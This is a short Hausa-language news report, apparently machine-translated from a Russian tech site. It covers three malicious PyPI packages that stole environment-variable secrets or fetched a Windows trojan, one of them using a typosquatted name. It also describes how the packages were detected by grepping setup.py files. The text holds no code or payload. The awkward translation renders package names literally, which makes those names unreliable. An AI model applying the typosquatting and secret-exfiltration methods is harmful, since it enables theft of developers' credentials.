An gano ɗakunan karatu guda uku masu ɗauke da lambar ɓarna a cikin kundin adireshin PyPI (Python Package Index). Kafin a gano matsalolin kuma a cire su daga kundin, an zazzage fakitin kusan sau dubu 15.
An rarraba fakitin dpp-abokin ciniki (zazzagewar 10194) da dpp-abokin ciniki1234 (1536 zazzagewar) tun watan Fabrairu kuma sun haɗa da lambar don aika abubuwan da ke cikin masu canjin yanayi, wanda, alal misali, na iya haɗawa da maɓallan shiga, alamu ko kalmomin shiga zuwa tsarin haɗin kai na ci gaba. ko yanayin girgije kamar AWS. Fakitin kuma sun aika da jeri mai ƙunshe da abubuwan cikin "/gida", "/mnt/mesos/" da "mnt/mesos/sandbox" kundayen adireshi zuwa ga mai masaukin baki.
Kunshin aws-login0tool (zazzagewar 3042) an buga shi zuwa ma'ajiyar PyPI a ranar 1 ga Disamba kuma ya haɗa lamba don saukewa da gudanar da aikace-aikacen Trojan don ɗaukar iko da runduna masu gudana Windows. Lokacin zabar sunan kunshin, an yi lissafin akan gaskiyar cewa maɓallan "0" da "-" suna kusa kuma akwai yuwuwar mai haɓakawa zai rubuta "aws-login0tool" maimakon "aws-login-tool".
An gano fakitin matsala a lokacin gwaji mai sauƙi, wanda aka zazzage wani ɓangare na fakitin PyPI (kimanin dubu 200 daga cikin fakiti dubu 330 a cikin ma'ajin) ta amfani da mai amfani na Bandersnatch, bayan haka mai amfani da grep ya gano tare da bincikar fakitin da suke. da aka ambata a cikin fayil ɗin setup.py Kiran "shigo da urllib.request", yawanci ana amfani da shi don aika buƙatun zuwa ga runduna ta waje.
source: budenet.ru